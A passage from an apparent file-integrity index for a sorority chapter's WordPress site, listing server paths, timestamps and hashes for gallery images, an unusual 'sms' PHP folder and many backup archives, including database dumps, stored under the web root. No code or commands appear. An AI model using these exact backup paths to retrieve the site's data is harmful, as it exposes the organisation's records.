tml\\/wp-content\\/gallery\\/test\\/IMG_0662-1.JPG_backup\":{\"d\":1413340942,\"h\":\"019261e3b4003fff2fcfaa8ccbb0fb21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0656-1.JPG\":{\"d\":1413340933,\"h\":\"a9e741a4922934c96b496040d812e2ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0657-1.JPG\":{\"d\":1413340935,\"h\":\"4c2beebfaf3eba0714fd16c1ad17579b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0658-1.JPG\":{\"d\":1413340936,\"h\":\"a7c609002631a741f7474741e4bcd705\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0662-1.JPG\":{\"d\":1413340942,\"h\":\"019261e3b4003fff2fcfaa8ccbb0fb21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0661-1.JPG\":{\"d\":1413340940,\"h\":\"b07e0ec7747e0c1321e270358b0b57d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0654-1.JPG\":{\"d\":1413340930,\"h\":\"0c3b9796ade675bb63d016d1513300ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0658-1.JPG_backup\":{\"d\":1413340936,\"h\":\"a7c609002631a741f7474741e4bcd705\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/Program-outside-1.jpg_backup\":{\"d\":1413340955,\"h\":\"d4db2998a9d37573cf59027c0a63819e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/test\\/IMG_0663-1.JPG_backup\":{\"d\":1413340945,\"h\":\"afd707436176da7aec1a6a83881654e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-march-of-dimes\\/dsc00996.jpg_backup\":{\"d\":1380832823,\"h\":\"00150baf8c4c870e533a3f255aa2cac9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-march-of-dimes\\/dsc00993.jpg_backup\":{\"d\":1380832814,\"h\":\"b4e57f27f3c3433d8ba2182c3858bef5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-march-of-dimes\\/dsc013171.jpg_backup\":{\"d\":1380832847,\"h\":\"c385f6ae7bc5501c5b83140f15c003a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-march-of-dimes\\/dsc00997.jpg_backup\":{\"d\":1380832838,\"h\":\"55614e1f0f79f375a0a4a08e452df553\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07382.jpg_backup\":{\"d\":1380832778,\"h\":\"79747074a4e1a2a24564d930ab277570\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07373.jpg_backup\":{\"d\":1380832749,\"h\":\"610ab911dcda14a82d895f4b6467c461\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07379.jpg_backup\":{\"d\":1380832772,\"h\":\"22fefdb5e234e871366906d27b678db1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07389.jpg_backup\":{\"d\":1380832785,\"h\":\"1a1bb0004e271aa32341674babc6811f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07372.jpg_backup\":{\"d\":1380832743,\"h\":\"b745ed645bcfb1951b68a6e613cdbbbe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-luggage-drive\\/dsc07378.jpg_backup\":{\"d\":1380832762,\"h\":\"bd0c7ba0dbb2a3cc6355cd8ab12858c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00223.jpg_backup\":{\"d\":1380833137,\"h\":\"e1b7f6b7e73c2f39343b4d37edf64207\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00215.jpg_backup\":{\"d\":1380833092,\"h\":\"77c1f0cc0edf34458509fbf9976ac1c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00198.jpg_backup\":{\"d\":1380832995,\"h\":\"35c169ddde41ebc785831ff4ed5d65f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00200.jpg_backup\":{\"d\":1380833024,\"h\":\"e489aab9e3d378cf57c626b392053538\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00207.jpg_backup\":{\"d\":1380833039,\"h\":\"84d6c10750e984f6adc4353d79e5a6a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00214.jpg_backup\":{\"d\":1380833073,\"h\":\"a7642814fad4570c7b7233f9807b53e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00208.jpg_backup\":{\"d\":1380833052,\"h\":\"d44024a56a3ead2cb609a0d2d281b999\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00221.jpg_backup\":{\"d\":1380833111,\"h\":\"4597c38b03573d4756bb31ddce2aa57b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-25th-anniversary\\/dsc00199.jpg_backup\":{\"d\":1380833010,\"h\":\"e6aaa03e89efaba24fbec9af36ebafcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-spring-2015-intake\\/silly-chapter.jpg_backup\":{\"d\":1431607085,\"h\":\"4576d6db2fcac25b405d6c6e9ff407de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-spring-2015-intake\\/state-director.jpg_backup\":{\"d\":1431607087,\"h\":\"aca694598716d245ca57ab01fcf3abc5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-spring-2015-intake\\/up-close-cake.jpg_backup\":{\"d\":1431607093,\"h\":\"d648fd9e5522a2721f2363c26e372a21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-spring-2015-intake\\/LGZ-spring-2015.jpg_backup\":{\"d\":1431607082,\"h\":\"24fd3cc5b552b4a964efd74135214916\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/lgz-spring-2015-intake\\/LGZ-Spring-2015-Intake-Class.jpg_backup\":{\"d\":1431606423,\"h\":\"73a526981abb281559c6d827453829ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-adopt-a-road\\/adopt-a-road.jpg_backup\":{\"d\":1380832601,\"h\":\"4019cdf45145fdb28ac4d6127a1adced\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-adopt-a-road\\/dsc01342.jpg_backup\":{\"d\":1380832622,\"h\":\"02d49a351e9023e7d5930001f776e2e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/gallery\\/2009-adopt-a-road\\/dsc01338.jpg_backup\":{\"d\":1380832611,\"h\":\"f63824622cf77d05959ab917dd24ad99\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/count.txt\":{\"d\":1514304336,\"h\":\"a3f390d88e4c41f2747bfa2f1b5f87db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/index.php\":{\"d\":1514264093,\"h\":\"4d69cdd14b709448be61c42197775e4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/array.txt\":{\"d\":1514304336,\"h\":\"735b90b4568125ed6c3f678819b6e058\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/make.php\":{\"d\":1514264093,\"h\":\"e26eecbc70df00de838e218e0b304330\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/of.css\":{\"d\":1514264093,\"h\":\"b24f63f8ef49134b872e07d41c5c635e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/sms\\/sms\\/api.txt\":{\"d\":1514264093,\"h\":\"49de016cf7ccfa6e141c4fa93a92f118\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-plugins.zip\":{\"d\":1558506052,\"h\":\"12e83552aaf9aa8988f1e36d65d5dc76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.a63a780fa2a3.txt\":{\"d\":1484531852,\"h\":\"be6e50c248d0cd0e72faf9c85e5fecfd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-uploads.zip\":{\"d\":1521699593,\"h\":\"cd613535984c5a80ba625e45d14ef73d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-plugins.zip\":{\"d\":1524376272,\"h\":\"8187c73b00a45a7db1f19616d1bab7a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-uploads2.zip\":{\"d\":1532240771,\"h\":\"4792baddbb163a24a41f1535b2888cf2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-uploads.zip\":{\"d\":1558506097,\"h\":\"b978fb6e84490c4e51f097409d789742\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-plugins.zip\":{\"d\":1550814677,\"h\":\"0d9b6685a79172e56b1935a9b63d162e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/index.html\":{\"d\":1484530832,\"h\":\"7645f25405ae2d31a5c96c306891bea0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-others.zip\":{\"d\":1511331213,\"h\":\"68cefb6db4df553b5c2a43f4d2207fa4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.2f7535df1001.txt\":{\"d\":1516523983,\"h\":\"a5f7fabda1217b70b2e9e3c512559485\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-plugins.zip\":{\"d\":1511331146,\"h\":\"63efb8d3e9380b0a5c147fa767e08d7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.9845bd174fde.txt\":{\"d\":1558520137,\"h\":\"d04f837e15a01a1c85301814d12b829d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.f7725003f32b.txt\":{\"d\":1553248274,\"h\":\"682af4a430e421372e418c3a3dcecb47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-others.zip\":{\"d\":1540187536,\"h\":\"dfa4477d7196406044add420f3ccca8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.9fe3f4facca8.txt\":{\"d\":1511346984,\"h\":\"ef4a62ad2b670fa34d871fd779e6d570\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-db.gz\":{\"d\":1524376348,\"h\":\"3864d5d772f6daa50c2ebff26f633c21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.781d0d2ea340.txt\":{\"d\":1508740814,\"h\":\"52e23cc0c0c4ce308b33414d90e29803\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-09-22-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_bf7d16eddf3f-others.zip\":{\"d\":1537595669,\"h\":\"5876b38474154d4b4481c64d5fa26213\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-uploads.zip\":{\"d\":1566454211,\"h\":\"4e333ffbd5462dd15f9d3d0be642b59d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-plugins.zip\":{\"d\":1516515839,\"h\":\"3de125329e32fb62708afbe629dd1297\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.634f750cc6d1.txt\":{\"d\":1550823750,\"h\":\"bc3e3c3ccd82dcdbe0a91fef6e57a0df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.fc842d2e31ba.txt\":{\"d\":1524379087,\"h\":\"5e72a58c4e97d910e87a99117ed9216d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-uploads.zip\":{\"d\":1550814738,\"h\":\"0cb0b4fa95393170ebf3c472d6bd0ed8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-uploads.zip\":{\"d\":1529648504,\"h\":\"f252f9ae4f8476dfc853ce16cf0d88ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.2e78d4c59616.txt\":{\"d\":1542874771,\"h\":\"a49d85289723601747494aeed0df3c7a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-db.gz\":{\"d\":1555912431,\"h\":\"240e8c5715e3483badc3500f9a2e59da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-uploads2.zip\":{\"d\":1524376328,\"h\":\"7224cb5c2dbc214fc4f7786e718b6d18\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-others.zip\":{\"d\":1508736544,\"h\":\"00fb0596efd58aa26d16eb5d413e3217\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-uploads2.zip\":{\"d\":1550814752,\"h\":\"63a5f014b7cc042d0325c6ae62635092\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-uploads2.zip\":{\"d\":1542866727,\"h\":\"716426a38b7abce677b5f89ba13061c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.ccc9f7097728.txt\":{\"d\":1545473811,\"h\":\"f8175a3507f31701c90b00cc9d104466\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-uploads2.zip\":{\"d\":1545458731,\"h\":\"65c5766e38caeccb9c7d1a2db6ddca86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-04-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_fc842d2e31ba-uploads.zip\":{\"d\":1524376318,\"h\":\"45da03807bd7f40de55be30048317577\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-others.zip\":{\"d\":1555912421,\"h\":\"9f50358a28dfe7163622745a4d8964ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-themes.zip\":{\"d\":1521699546,\"h\":\"f61f851b2bd0ac7034f00cb39d25e4c7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-others.zip\":{\"d\":1526969287,\"h\":\"37f9016ab3a423f048d550720a830b01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-others.zip\":{\"d\":1548136838,\"h\":\"f5f606e7e69d9d7f5320b92caa28d6cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-uploads.zip\":{\"d\":1526969267,\"h\":\"c7bd09ce5d530b36313bb2757285ff1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-uploads.zip\":{\"d\":1511331193,\"h\":\"5652b79d99fc01723ed97abc06bdde8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-uploads.zip\":{\"d\":1548136807,\"h\":\"766a657b24750a15ae35a10f24cb6677\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-uploads2.zip\":{\"d\":1561182771,\"h\":\"5eb64198569819fb33064e74efd8e23b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-uploads.zip\":{\"d\":1508737799,\"h\":\"21206f3655a75b28261dbcbfa8061df4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-db.gz\":{\"d\":1513922285,\"h\":\"6aa5d930485574ddc5200e3faca82f81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0027_Zeta_Phi_Beta_Sorority_Inc_Lam_6e8217318838-plugins.zip\":{\"d\":1508736475,\"h\":\"7c30dca2dd8af135f3c2ed9620af528b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-plugins.zip\":{\"d\":1553233910,\"h\":\"582a8c6244e51a2b1cfd52efac1e0049\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-others.zip\":{\"d\":1521699621,\"h\":\"40817515050cc50ffdd3119b97be3350\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-11-22-0112_Zeta_Phi_Beta_Sorority_Inc_Lam_9fe3f4facca8-db.gz\":{\"d\":1511331222,\"h\":\"4e2d6c267dbd19273db35a7e2c924988\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.c2d68a8aec10.txt\":{\"d\":1519115632,\"h\":\"9a699f57e4ee66e86e45878259666b9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-plugins.zip\":{\"d\":1555912343,\"h\":\"4cc9bfbcfe037ebffd1090d72b14e827\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-08-22-0111_Zeta_Phi_Beta_Sorority_Inc_Lam_762d83b6d4e9-others.zip\":{\"d\":1534918393,\"h\":\"95531d2ccd3cd87f8f11f176c857ca46\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-db.gz\":{\"d\":1529648534,\"h\":\"73bbd2ca2ad20c49e2bc269492a93795\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-01-21-0123_Zeta_Phi_Beta_Sorority_Inc_Lam_2f7535df1001-others.zip\":{\"d\":1516515906,\"h\":\"4ccbc082c5c567ea7f339a827dbae85f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-uploads.zip\":{\"d\":1563774761,\"h\":\"3b5b7f52ca04368cfc9d077e387ed5bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-db.gz\":{\"d\":1550814771,\"h\":\"b5971eb84ea0050be48ffe114ca558ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-03-22-0118_Zeta_Phi_Beta_Sorority_Inc_Lam_4299d32b2219-db.gz\":{\"d\":1521699630,\"h\":\"4d8382bb4fc8bf76f1c2907e429522a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-12-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_7e35b1e7831a-plugins.zip\":{\"d\":1513922173,\"h\":\"5174ae909255b4bbceee44166219f89a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.762d83b6d4e9.txt\":{\"d\":1534935506,\"h\":\"ab9857ce54018e1d050367efa1e84268\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-db.gz\":{\"d\":1566454258,\"h\":\"abeab7654af4ccb85c29ae110d6c073f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-others.zip\":{\"d\":1550814760,\"h\":\"37f9016ab3a423f048d550720a830b01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-others.zip\":{\"d\":1558506134,\"h\":\"5876b38474154d4b4481c64d5fa26213\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-02-20-0101_Zeta_Phi_Beta_Sorority_Inc_Lam_c2d68a8aec10-db.gz\":{\"d\":1519106629,\"h\":\"4eb3569afcec910469b60be9bbb56004\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-plugins.zip\":{\"d\":1532240713,\"h\":\"853aae4a7f16eaac570082318dad3a70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-db.gz\":{\"d\":1545458753,\"h\":\"129bba85d4e5cc0d0f37a0602e7ba2ba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-07-22-0124_Zeta_Phi_Beta_Sorority_Inc_Lam_36f2abdd31bf-others.zip\":{\"d\":1532240781,\"h\":\"37f9016ab3a423f048d550720a830b01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-others.zip\":{\"d\":1553233988,\"h\":\"9f50358a28dfe7163622745a4d8964ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_5e2c9677cd19-uploads2.zip\":{\"d\":1540187520,\"h\":\"21a1cfb9800c8ed140944f444b8f25b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-others.zip\":{\"d\":1542866737,\"h\":\"0fbfb3adcbb0fe95d589adfdfe3911b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.f0f5a84bf26e.txt\":{\"d\":1508737831,\"h\":\"d3c9b8b8aaf1d9de39bce4f46a39d1b0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-plugins.zip\":{\"d\":1545458671,\"h\":\"e063300e66172a3cb87c7272cc1cb295\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-plugins.zip\":{\"d\":1548136725,\"h\":\"ec3b3bf269da70b9ad8b2ad3e1122799\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.6e8217318838.txt\":{\"d\":1508737917,\"h\":\"21528863af2e5c8e61805de499230dbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-11-22-0103_Zeta_Phi_Beta_Sorority_Inc_Lam_2e78d4c59616-uploads.zip\":{\"d\":1542866714,\"h\":\"162dbfe35d2845f8282f8572970e328f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-others.zip\":{\"d\":1561182780,\"h\":\"292887fafc786a089ccf0b2489c289f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/web.config\":{\"d\":1484530832,\"h\":\"67da82c8c78834859f36bffd79337138\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.4bab9ed25282.txt\":{\"d\":1563777655,\"h\":\"fa1b19046bdfcd6ed67d2b880aaa5c98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-uploads2.zip\":{\"d\":1553233977,\"h\":\"df6bd5ddefb2063346ef167397c9590a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-06-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_ba4609141dcc-others.zip\":{\"d\":1529648524,\"h\":\"95531d2ccd3cd87f8f11f176c857ca46\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-12-22-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_ccc9f7097728-others.zip\":{\"d\":1545458740,\"h\":\"f5f606e7e69d9d7f5320b92caa28d6cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2017-10-23-0048_Zeta_Phi_Beta_Sorority_Inc_Lam_781d0d2ea340-others.zip\":{\"d\":1508737816,\"h\":\"972dfd76e99eb0033c03757ab14c3b1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-uploads2.zip\":{\"d\":1566454236,\"h\":\"b4cf592592742c83d1e9d3ba51091860\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.69fa7a1edb65.txt\":{\"d\":1561185677,\"h\":\"958224ff6eaa40e743f662447030be6e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/log.bf7d16eddf3f.txt\":{\"d\":1537613569,\"h\":\"8459c4df6cbc138263db8072dfc3be62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-plugins.zip\":{\"d\":1561182699,\"h\":\"396a71e8306de15a0e1966e3ee06dbd4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/updraft\\/backup_2018-05-22-0106_Zeta_Phi_Beta_Sorority_Inc_Lam_ec3cca157310-themes.zip\":{\"d\":1526969229,\"h\":\"f61f851b2bd0ac7034f00cb39d25e4c7\"},\"\\/home2\\